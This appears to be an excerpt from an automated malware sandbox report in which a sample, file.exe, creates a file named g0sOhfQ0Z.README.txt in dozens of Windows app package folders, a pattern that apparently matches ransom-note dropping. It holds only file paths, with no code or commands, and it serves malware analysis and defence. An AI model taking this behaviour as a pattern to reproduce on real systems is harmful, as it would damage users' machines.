            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\1230\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\2\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\1\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
